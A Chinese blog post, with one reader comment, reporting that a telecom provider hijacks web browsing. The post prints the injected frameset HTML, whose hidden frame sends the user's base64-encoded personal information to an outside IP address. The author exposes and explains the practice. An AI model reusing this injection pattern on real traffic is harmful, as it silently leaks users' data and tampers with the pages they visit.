电信半路劫持用户访问新招

最近发现在浏览网页时,换了页面,地址栏里的url却没有变。一开始觉得奇怪,以为是最近MS的升级把IE搞坏了,后来用“查看源文件”功能,才真相大白:原来又是伟大的电信公司做的手脚:将用户所访问的网站装在一个自己的网页框架里返回。

下面是源文件代码:
<HTML><frameset border=’0′ frameSpacing=’0′ rows=’0,100%’ frameBorder=’0′
<frame id =’frm123′ name=’frm123′ src=’ http://220.167.29.103:9123/ndatin.aspx? param= 我的个人信息的base64编码 ==&ref=1 ‘><frame id =’frmOLD’ name=’frmOLD’ src=’我要访问的网站的URL?’></frameset></HTML>

这种方法,电信可以想向用户夹带什么就夹带什么。而且这招很狠毒:如果你屏蔽了电信的网站IP,他的这个frame页面就加载不了,你要看的网站就出不来。

对斜体部分的更正:可以屏蔽,正常网站能出来。
原因如下:这个框架代码本身是电信在路由上直接冒充你访问的网站返回给你的数据,对这个框架代码本身你是无计可施的;
框架代码中含有两个调用网页的指令,一个去调用那个
220.167.29.103上的广告什么的;另一个去调用你原先要访问的网页。
因此,屏蔽掉220.167.29.103不会影响要访问的网页。
不过,想自己动手屏蔽掉电信发过来的框架代码是不可能的。
点这里看网上关于这个220.167.29.103的更多信息

对《电信半路劫持用户访问新招》有 1 条评论

  1. wer 说:

    最近最近我的电脑的游览器被广东东莞电信劫持了.
    打开网页就是广东省东莞市电信的装宽带送笔记本的宣传广告.郁闷死了………
    中国有没有哪个部门专管电信的????

发表一条评论